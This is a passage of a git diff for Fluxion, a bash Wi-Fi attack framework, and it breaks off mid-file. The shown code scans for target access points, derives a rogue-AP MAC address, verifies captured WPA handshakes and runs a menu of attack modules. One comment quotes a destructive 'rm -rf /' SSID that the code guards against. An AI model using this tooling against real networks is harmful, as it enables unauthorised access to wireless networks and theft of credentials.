candidateInterfaceAlt=${FluxionInterfaces["$candidateInterface"]} + if [ "$candidateInterfaceAlt" ]; then + interfacesAvailable+=("$candidateInterfaceAlt") + + interfacesAvailableColor+=("$CGrn") + interfacesAvailableState+=("[*]") + else + interfacesAvailable+=("$candidateInterface") + + interface_state "$candidateInterface" + + if [ "$InterfaceState" = "up" ]; then + interfacesAvailableColor+=("$CPrp") + interfacesAvailableState+=("[-]") + else + interfacesAvailableColor+=("$CClr") + interfacesAvailableState+=("[+]") + fi + fi + done + + # If only one interface exists and it's not unavailable, choose it. + if [ "${#interfacesAvailable[@]}" -eq 1 -a \ + "${interfacesAvailableState[0]}" != "[-]" -a \ + "$skipOption" == "" ]; then + FluxionInterfaceSelected="${interfacesAvailable[0]}" + FluxionInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + break + else + if [ $skipOption ]; then + interfacesAvailable+=("$FLUXIONGeneralSkipOption") + interfacesAvailableColor+=("$CClr") + fi + + interfacesAvailable+=( + "$FLUXIONGeneralRepeatOption" + "$FLUXIONGeneralBackOption" + ) + + interfacesAvailableColor+=( + "$CClr" + "$CClr" + ) + + format_apply_autosize \ + "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + + io_query_format_fields \ + "$FLUXIONVLine $interfaceQuery" "$FormatApplyAutosize" \ + interfacesAvailableColor[@] interfacesAvailable[@] \ + interfacesAvailableState[@] interfacesAvailableInfo[@] + + echo + + case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralSkipOption") + FluxionInterfaceSelected="" + FluxionInterfaceSelectedState="" + FluxionInterfaceSelectedInfo="" + return 0;; + "$FLUXIONGeneralRepeatOption") continue;; + "$FLUXIONGeneralBackOption") return -1;; + *) + FluxionInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" + break;; + esac + fi + done +} + + +# ============== < Fluxion Target Subroutines > ============== # +# Parameters: interface [ channel(s) [ band(s) ] ] +# ------------------------------------------------------------ # +# Return 1: Missing monitor interface. +# Return 2: Xterm failed to start airmon-ng. +# Return 3: Invalid capture file was generated. +# Return 4: No candidates were detected. +fluxion_target_get_candidates() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" + echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" + + # Assure all previous scan results have been cleared. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + #if [ "$FLUXIONAuto" ]; then + # sleep 30 && killall xterm & + #fi + + # Begin scanner and output all results to "dump-01.csv." + if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG \ + -bg "#000000" -fg "#FFFFFF" -e \ + "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" + sleep 5 + return 2 + fi + + # Sanity check the capture files generated by the scanner. + # If the file doesn't exist, or if it's empty, abort immediately. + if [ ! -f "$FLUXIONWorkspacePath/dump-01.csv" -o \ + ! -s "$FLUXIONWorkspacePath/dump-01.csv" ]; then + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + return 3 + fi + + # Syntheize scan opeFLUXIONWindowRation results from output file "dump-01.csv." + echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" + # WARNING: The code below may break with different version of airmon-ng. + # The times matching operator "{n}" isn't supported by mawk (alias awk). + # readarray FLUXIONTargetCandidates < <( + # gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + # readarray FLUXIONTargetCandidatesClients < <( + # gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + local -r matchMAC="([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]" + readarray FluxionTargetCandidates < <( + awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ + "$FLUXIONWorkspacePath/dump-01.csv" + ) + readarray FluxionTargetCandidatesClients < <( + awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ + "$FLUXIONWorkspacePath/dump-01.csv" + ) + + # Cleanup the workspace to prevent potential bugs/conflicts. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + if [ ${#FluxionTargetCandidates[@]} -eq 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" + sleep 3 + return 4 + fi +} + + +fluxion_get_target() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + local -r interface=$1 + + local choices=( \ + "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ + "$FLUXIONScannerChannelOptionAll (5GHz)" \ + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" \ + "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption" + ) + + io_query_choice "$FLUXIONScannerChannelQuery" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONScannerChannelOptionAll (2.4GHz)") + fluxion_target_get_candidates $interface "" "bg";; + + "$FLUXIONScannerChannelOptionAll (5GHz)") + fluxion_target_get_candidates $interface "" "a";; + + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") + fluxion_target_get_candidates $interface "" "abg";; + + "$FLUXIONScannerChannelOptionSpecific") + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" + echo + echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " + echo + echo -ne "$FLUXIONPrompt" + + local channels + read channels + + echo + + fluxion_target_get_candidates $interface $channels;; + + "$FLUXIONGeneralBackOption") + return -1;; + esac + + # Abort if errors occured while searching for candidates. + if [ $? -ne 0 ]; then return 2; fi + + local candidatesMAC=() + local candidatesClientsCount=() + local candidatesChannel=() + local candidatesSecurity=() + local candidatesSignal=() + local candidatesPower=() + local candidatesESSID=() + local candidatesColor=() + + # Gather information from all the candidates detected. + # TODO: Clean up this for loop using a cleaner algorithm. + # Maybe try using array appending & [-1] for last elements. + for candidateAPInfo in "${FluxionTargetCandidates[@]}"; do + # Strip candidate info from any extraneous spaces after commas. + candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") + + local i=${#candidatesMAC[@]} + + candidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) + candidatesClientsCount[i]=$( + echo "${FluxionTargetCandidatesClients[@]}" | + grep -c "${candidatesMAC[i]}" + ) + candidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) + candidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) + candidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) + candidatesColor[i]=$( + [ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr + ) + + # Parse any non-ascii characters by letting bash handle them. + # Escape all single quotes in ESSID and let bash's $'...' handle it. + local sanitizedESSID=$( + echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 + ) + candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") + + local power=${candidatesPower[i]} + if [ $power -eq -1 ]; then + # airodump-ng's man page says -1 means unsupported value. + candidatesQuality[i]="??" + elif [ $power -le $FLUXIONNoiseFloor ]; then + candidatesQuality[i]=0 + elif [ $power -gt $FLUXIONNoiseCeiling ]; then + candidatesQuality[i]=100 + else + # Bash doesn't support floating point division, work around it... + # Q = ((P - F) / (C - F)); Q-quality, P-power, F-floor, C-Ceiling. + candidatesQuality[i]=$(( \ + (${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ + (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10) \ + )) + fi + done + + format_center_literals "WIFI LIST" + local -r headerTitle="$FormatCenterLiterals\n\n" + + format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" + local -r headerFields=$( + printf "$FormatApplyAutosize" \ + "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID" + ) + + format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" + io_query_format_fields "$headerTitle$headerFields" \ + "$FormatApplyAutosize" \ + candidatesColor[@] \ + candidatesESSID[@] \ + candidatesQuality[@] \ + candidatesPower[@] \ + candidatesClientsCount[@] \ + candidatesChannel[@] \ + candidatesSecurity[@] \ + candidatesMAC[@] + + echo + + FluxionTargetMAC=${IOQueryFormatFields[7]} + FluxionTargetSSID=${IOQueryFormatFields[1]} + FluxionTargetChannel=${IOQueryFormatFields[5]} + + FluxionTargetEncryption=${IOQueryFormatFields[6]} + + FluxionTargetMakerID=${FluxionTargetMAC:0:8} + FluxionTargetMaker=$( + macchanger -l | + grep ${FluxionTargetMakerID,,} 2> $FLUXIONOutputDevice | + cut -d ' ' -f 5- + ) + + # Sanitize network ESSID to make it safe for manipulation. + # Notice: Why remove these? Some smartass might decide to name their + # network "; rm -rf / ;". If the string isn't sanitized accidentally + # shit'll hit the fan and we'll have an extremly distressed user. + # Replacing ' ', '/', '.', '~', '\' with '_' + FluxionTargetSSIDClean=$( + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + + # We'll change a single hex digit from the target AP's MAC address. + # This new MAC address will be used as the rogue AP's MAC address. + local -r rogueMACHex=$(printf %02X $((0x${FluxionTargetMAC:13:1} + 1))) + FluxionTargetRogueMAC="${FluxionTargetMAC::13}${rogueMACHex:1:1}${FluxionTargetMAC:14:4}" +} + +fluxion_target_show() { + format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" + + local colorlessFormat="$FormatApplyAutosize" + local colorfullFormat=$( + echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g' + ) + + printf "$colorlessFormat" "" "ESSID" "\"${FluxionTargetSSID:-[N/A]}\" / ${FluxionTargetEncryption:-[N/A]}" "" + printf "$colorlessFormat" "" "Channel" " ${FluxionTargetChannel:-[N/A]}" "" + printf "$colorfullFormat" "" "BSSID" " ${FluxionTargetMAC:-[N/A]} ($CYel${FluxionTargetMaker:-[N/A]}$CClr)" "" + + echo +} + +fluxion_target_unset_tracker() { + if [ ! "$FluxionTargetTrackerInterface" ]; then return 1; fi + + FluxionTargetTrackerInterface="" +} + +fluxion_target_set_tracker() { + if [ "$FluxionTargetTrackerInterface" ]; then return 0; fi + + # Check if attack provides tracking interfaces, get & set one. + if ! type -t attack_tracking_interfaces &> /dev/null; then + return 1 + fi + + if [ "$FluxionTargetTrackerInterface" == "" -a ! "$FLUXIONAuto" ]; then + echo "Running get interface (tracker)." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_tracking_interfaces \ + "$FLUXIONTargetTrackerInterfaceQuery"; then + echo "Failed to get tracker interface!" > $FLUXIONOutputDevice + return 2 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$FluxionTargetTrackerInterface + fi + + # If user skipped a tracker interface, move on. + if [ ! "$selectedInterface" ]; then + fluxion_target_unset_tracker + return 0 + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate tracking interface!" > $FLUXIONOutputDevice + return 3 + fi + + echo "Successfully got tracker interface." > $FLUXIONOutputDevice + FluxionTargetTrackerInterface=${FluxionInterfaces[$selectedInterface]} +} + +fluxion_target_unset() { + FluxionTargetMAC="" + FluxionTargetSSID="" + FluxionTargetChannel="" + + FluxionTargetEncryption="" + + FluxionTargetMakerID="" + FluxionTargetMaker="" + + FluxionTargetSSIDClean="" + + FluxionTargetRogueMAC="" + + return 1 # To trigger undo-chain. +} + +fluxion_target_set() { + # Check if attack is targetted & set the attack target if so. + if ! type -t attack_targetting_interfaces &> /dev/null; then + return 1 + fi + + if [ \ + "$FluxionTargetSSID" -a \ + "$FluxionTargetMAC" -a \ + "$FluxionTargetChannel" \ + ]; then + # If we've got a candidate target, ask user if we'll keep targetting it. + + fluxion_header + fluxion_target_show + echo + echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" + + # TODO: This doesn't translate choices to the selected language. + while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do + echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " + local choice + read choice + if [ ! "$choice" ]; then break; fi + done + + echo -ne "\n\n" + + if [ "${choice,,}" != "n" ]; then + return 0 + fi + elif [ \ + "$FluxionTargetSSID" -o \ + "$FluxionTargetMAC" -o \ + "$FluxionTargetChannel" \ + ]; then + # TODO: Survey environment here to autofill missing fields. + # In other words, if a user gives incomplete information, scan + # the environment based on either the ESSID or BSSID, & autofill. + echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" + sleep 3 + fi + + if ! fluxion_get_interface attack_targetting_interfaces; then + return 2 + fi + + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 3 + fi + + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 4 + fi +} + + +# =================== < Hash Subroutines > =================== # +# Parameters: [channel [encryption [maker]]] +fluxion_hash_verify() { + if [ ${#@} -lt 3 ]; then return 1; fi + + local -r hashPath=$1 + local -r hashBSSID=$2 + local -r hashESSID=$3 + local -r hashChannel=$4 + local -r hashEncryption=$5 + local -r hashMaker=$6 + + if [ ! -f "$hashPath" -o ! -s "$hashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" + sleep 3 + return 2 + fi + + if [ "$FLUXIONAuto" ]; then + local -r verifier="pyrit" + else + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" + echo + + fluxion_target_show + + local choices=( \ + "$FLUXIONHashVerificationMethodPyritOption" \ + "$FLUXIONHashVerificationMethodAircrackOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONHashVerificationMethodPyritOption") + local -r verifier="pyrit" ;; + + "$FLUXIONHashVerificationMethodAircrackOption") + local -r verifier="aircrack-ng" ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + + hash_check_handshake \ + "$verifier" \ + "$hashPath" \ + "$hashESSID" \ + "$hashBSSID" + + local -r hashResult=$? + + # A value other than 0 means there's an issue with the hash. + if [ $hashResult -ne 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" + else + echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" + fi + + sleep 3 + + if [ $hashResult -ne 0 ]; then return 1; fi +} + +fluxion_hash_unset_path() { + if [ ! "$FluxionHashPath" ]; then return 1; fi + FluxionHashPath="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi +} + +# Parameters: [channel [encryption [maker]]] +fluxion_hash_set_path() { + if [ "$FluxionHashPath" ]; then return 0; fi + + fluxion_hash_unset_path + + local -r hashPath=$1 + + # If we've got a default path, check if a hash exists. + # If one exists, ask users if they'd like to use it. + if [ "$hashPath" -a -f "$hashPath" -a -s "$hashPath" ]; then + if [ "$FLUXIONAuto" ]; then + FluxionHashPath=$hashPath + return + else + local choices=( \ + "$FLUXIONUseFoundHashOption" \ + "$FLUXIONSpecifyHashPathOption" \ + "$FLUXIONHashSourceRescanOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" + echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" + echo + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONUseFoundHashOption") + FluxionHashPath=$hashPath + return ;; + + "$FLUXIONHashSourceRescanOption") + fluxion_hash_set_path "$@" + return $? ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + fi + + while [ ! "$FluxionHashPath" ]; do + fluxion_header + + echo + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileReturnTip" + echo + echo -ne "$FLUXIONAbsolutePathInfo: " + read FluxionHashPath + + # Back-track when the user leaves the hash path blank. + # Notice: Path is cleared if we return, no need to unset. + if [ ! "$FluxionHashPath" ]; then return -1; fi + + # Make sure the path points to a valid generic file. + if [ ! -f "$FluxionHashPath" -o ! -s "$FluxionHashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONEmptyOrNonExistentHashError" + sleep 5 + fluxion_hash_unset_path + fi + done +} + +# Paramters: +fluxion_hash_get_path() { + # Assure we've got the bssid and the essid passed in. + if [ ${#@} -lt 2 ]; then return 1; fi + + while true; do + fluxion_hash_unset_path + if ! fluxion_hash_set_path "$@"; then return $?; fi + + if fluxion_hash_verify "$FluxionHashPath" "$2" "$3"; then + break; + fi + done + + # At this point FluxionHashPath will be set and ready. +} + + +# ================== < Attack Subroutines > ================== # +fluxion_unset_attack() { + local -r attackWasSet=${FluxionAttack:+1} + FluxionAttack="" + if [ ! "$attackWasSet" ]; then return 1; fi +} + +fluxion_set_attack() { + if [ "$FluxionAttack" ]; then return 0; fi + + fluxion_unset_attack + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONAttackQuery" + echo + + fluxion_target_show + + local attacks + readarray -t attacks < <(ls -1 attacks) + + local descriptions + readarray -t descriptions < <( + head -n 3 attacks/*/language/$FluxionLanguage.sh | \ + grep -E "^# description: " | sed -E 's/# \w+: //' + ) + + local identifiers=() + + local attack + for attack in "${attacks[@]}"; do + local identifier=$( + head -n 3 "attacks/$attack/language/$FluxionLanguage.sh" | \ + grep -E "^# identifier: " | sed -E 's/# \w+: //' + ) + if [ "$identifier" ]; then identifiers+=("$identifier") + else identifiers+=("$attack") + fi + done + + attacks+=("$FLUXIONGeneralBackOption") + identifiers+=("$FLUXIONGeneralBackOption") + descriptions+=("") + + io_query_format_fields "" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" \ + attacks[@] identifiers[@] descriptions[@] + + echo + + if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then + return -1 + fi + + if [ "${IOQueryFormatFields[1]}" = "$FluxionRestartOption" ]; then + return 2 + fi + + + FluxionAttack=${IOQueryFormatFields[0]} +} + +fluxion_unprep_attack() { + if type -t unprep_attack &> /dev/null; then + unprep_attack + fi + + IOUtilsHeader="fluxion_header" + + return 1 # Trigger another undo since prep isn't significant. +} + +fluxion_prep_attack() { + local -r path="$FLUXIONPath/attacks/$FluxionAttack" + + if [ ! -x "$path/attack.sh" ]; then return 1; fi + if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi + + # Load attack parameters if any exist. + if [ "$AttackCLIArguments" ]; then + eval set -- "$AttackCLIArguments" + # Remove them after loading them once. + unset AttackCLIArguments + fi + + # Load attack and its corresponding language file. + # Load english by default to overwrite globals that ARE defined. + source "$path/language/en.sh" + if [ "$FluxionLanguage" != "en" ]; then + source "$path/language/$FluxionLanguage.sh" + fi + source "$path/attack.sh" + + # Check if attack is targetted & set the attack target if so. + if type -t attack_targetting_interfaces &> /dev/null; then + if ! fluxion_target_set; then return 3; fi + fi + + # Check if attack provides tracking interfaces, get & set one. + if type -t attack_tracking_interfaces &> /dev/null; then + if ! fluxion_target_set_tracker; then return 4; fi + # TODO: Remove this below after we've implemented tracking. + # I suggest we use airodump-ng, periodically checking by BSSID. + if [ "$FluxionTargetTrackerInterface" ]; then + fluxion_header + echo -e "$FLUXIONVLine Hold the hell up... that hasn't been implemented yet." + sleep 4 + echo -e "$FLUXIONVLine We'll pretend you selected \"$FLUXIONGeneralSkipOption\"$CClr." + sleep 4 + FluxionTargetTrackerInterface="" + fi + fi + + if ! prep_attack; then return 5; fi +} + +fluxion_run_attack() { + start_attack + + local choices=( \ + "$FLUXIONSelectAnotherAttackOption" \ + "$FLUXIONGeneralExitOption" \ + ) + + io_query_choice \ + "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] + + echo + + # IOQueryChoice is a global, meaning, its value is volatile. + # We need to make sure to save the choice before it changes. + local choice="$IOQueryChoice" + + stop_attack + + if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then + fluxion_handle_exit + fi + + fluxion_unset_attack +} + + +# ============================================================ # +# ================= < Argument Executables > ================= # +# ============================================================ # +eval set -- "$FLUXIONCLIArguments" # Set environment parameters. +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < FLUXION Loop > ===================== # +# ============================================================ # +fluxion_main() { + fluxion_startup + + fluxion_set_resolution + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( + "set_language" + "set_attack" + "prep_attack" + "run_attack" + ) + + while true; do # Fluxion's runtime-loop. + fluxion_do_sequence fluxion sequence[@] + done + + fluxion_shutdown +} + +fluxion_main # Start Fluxion + +# FLUXSCRIPT END diff --git a/fluxion.sh b/fluxion.sh deleted file mode 100755 index 0388588..0000000 --- a/fluxion.sh +++ /dev/null @@ -1,1025 +0,0 @@ -#!/bin/bash - -################################ < FLUXION Parameters > ################################ -# NOTE: The FLUXIONPath constant will not be populated correctly if the script is called -# directly via a symlink. Symlinks in the path to the script should work completely fine. -declare -r FLUXIONPath="$(cd "$(dirname "$0")" ;pwd -P -)" - -declare -r FLUXIONWorkspacePath="/tmp/fluxspace" -declare -r FLUXIONHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes" -declare -r FLUXIONScanDB="dump" - -declare -r FLUXIONNoiseFloor=-90 -declare -r FLUXIONNoiseCeiling=-60 - -declare -r FLUXIONVersion=3 -declare -r FLUXIONRevision=11 - -declare -r FLUXIONDebug=${FLUXIONDebug:+1} -declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} -declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} -declare -r FLUXIONAuto=${FLUXIONAuto:+1} - -# FLUXIONDebug [Normal Mode "" / Developer Mode 1] -declare -r FLUXIONOutputDevice=$([ $FLUXIONDebug ] && echo "/dev/stdout" || echo "/dev/null") - -declare -r FLUXIONHoldXterm=$([ $FLUXIONDebug ] && echo "-hold" || echo "") - -################################# < Library Includes > ################################# -source lib/installer/InstallerUtils.sh -source lib/InterfaceUtils.sh -source lib/SandboxUtils.sh -source lib/FormatUtils.sh -source lib/ColorUtils.sh -source lib/IOUtils.sh -source lib/HashUtils.sh - -################################ < FLUXION Parameters > ################################ -FLUXIONPrompt="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " -FLUXIONVLine="$CRed[$CSYel*$CClr$CRed]$CClr" - -################################ < Library Parameters > ################################ -InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" - -SandboxWorkspacePath="$FLUXIONWorkspacePath" -SandboxOutputDevice="$FLUXIONOutputDevice" - -InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" -InstallerUtilsOutputDevice="$FLUXIONOutputDevice" -InstallerUtilsNoticeMark="$FLUXIONVLine" - -PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" - -IOUtilsHeader="fluxion_header" -IOUtilsQueryMark="$FLUXIONVLine" -IOUtilsPrompt="$FLUXIONPrompt" - -HashOutputDevice="$FLUXIONOutputDevice" - -################################# < Super User Check > ################################# -if [ $EUID -ne 0 ]; then - echo -e "${CRed}You don't have admin privilegies, execute the script as root.$CClr" - exit 1 -fi - -################################### < XTerm Checks > ################################### -if [ ! "${DISPLAY:-}" ]; then - echo -e "${CRed}The script should be executed inside a X (graphical) session.$CClr" - exit 2 -fi - -if ! hash xdpyinfo 2>/dev/null; then - echo -e "${CRed}xdpyinfo not installed, please install the relevant package for your distribution.$CClr" - exit 3 -fi - -if ! xdpyinfo &>/dev/null; then - echo -e "${CRed}The script failed to initialize an xterm test session.$CClr" - exit 3 -fi - -################################# < Default Language > ################################# -source language/en.sh - -################################# < User Preferences > ################################# -if [ -x "$FLUXIONPath/preferences.sh" ]; then source "$FLUXIONPath/preferences.sh"; fi - -######################################################################################## -function fluxion_exitmode() { - if [ $FLUXIONDebug ]; then return 1; fi - - fluxion_header - - echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" - - # List currently running processes which we might have to kill before exiting. - local processes - readarray processes < <(ps -A) - - # Currently, fluxion is only responsible for killing airodump-ng, because - # fluxion explicitly it uses it to scan for candidate target access points. - # NOTICE: Processes started by subscripts, such as an attack script, - # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. - local targets=("airodump-ng") - - local targetID # Program identifier/title - for targetID in "${targets[@]}"; do - # Get PIDs of all programs matching targetPID - local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') - if [ ! "$targetPID" ]; then continue; fi - echo -e "$CWht[$CRed-$CWht] $(io_dynamic_output $FLUXIONKillingProcessNotice)" - killall $targetPID &>$FLUXIONOutputDevice - done - - # If the installer activated the package manager, make sure to undo any changes. - if [ "$PackageManagerCLT" ]; then - echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" - unprep_package_manager - fi - - if [ "$WIMonitor" ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $WIMonitor$CClr" - if [ "$FLUXIONAirmonNG" ]; then airmon-ng stop "$WIMonitor" &>$FLUXIONOutputDevice - else interface_set_mode "$WIMonitor" "managed" - fi - fi - - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" - tput cnorm - - if [ ! $FLUXIONDebug ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" - sandbox_remove_workfile "$FLUXIONWorkspacePath/*" - fi - - if [ $FLUXIONWIKillProcesses ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" - - # systemctl check - systemd=$(whereis systemctl) - if [ "$systemd" = "" ]; then - service network-manager restart &>$FLUXIONOutputDevice & - service networkmanager restart &>$FLUXIONOutputDevice & - service networking restart &>$FLUXIONOutputDevice & - else - systemctl restart NetworkManager &>$FLUXIONOutputDevice & - fi - fi - - echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" - echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" - - sleep 3 - - clear - - exit 0 -} - -# Delete log only in Normal Mode ! -function fluxion_conditional_clear() { - # Clear iff we're not in debug mode - if [ ! $FLUXIONDebug ]; then clear; fi -} - -function fluxion_conditional_bail() { - echo ${1:-"Something went wrong, whoops! (report this)"} - sleep 5 - if [ ! $FLUXIONDebug ]; then - fluxion_handle_exit - return 1 - fi - echo "Press any key to continue execution..." - read bullshit -} - -# ERROR Report only in Developer Mode -function fluxion_error_report() { - echo "Error on line $1" -} - -if [ "$FLUXIONDebug" ]; then - trap 'fluxion_error_report $LINENUM' ERR -fi - -function fluxion_handle_abort_attack() { - if [ $(type -t stop_attack) ]; then - stop_attack &>$FLUXIONOutputDevice - unprep_attack &>$FLUXIONOutputDevice - else - echo "Attack undefined, can't stop anything..." >$FLUXIONOutputDevice - fi -} - -# In case an abort signal is received, -# abort any attacks currently running. -trap fluxion_handle_abort_attack SIGABRT - -function fluxion_handle_exit() { - fluxion_handle_abort_attack - fluxion_exitmode - exit 1 -} - -# In case of unexpected termination, run fluxion_exitmode -# to execute cleanup and reset commands. -trap fluxion_handle_exit SIGINT SIGHUP - -function fluxion_header() { - format_apply_autosize "[%*s]\n" - local verticalBorder=$FormatApplyAutosize - - format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" - local headerTextFormat="$FormatApplyAutosize" - - fluxion_conditional_clear - - echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" - printf "$CSRed$verticalBorder" "" - printf "$headerTextFormat" "" "" - printf "$CSBlu$verticalBorder" "" - echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" - echo - echo -} - -# Create working directory -if [ ! -d "$FLUXIONWorkspacePath" ]; then - mkdir -p "$FLUXIONWorkspacePath" &>$FLUXIONOutputDevice -fi - -####################################### < Start > ###################################### -if [ ! $FLUXIONDebug ]; then - FLUXIONBanner=() - - format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ 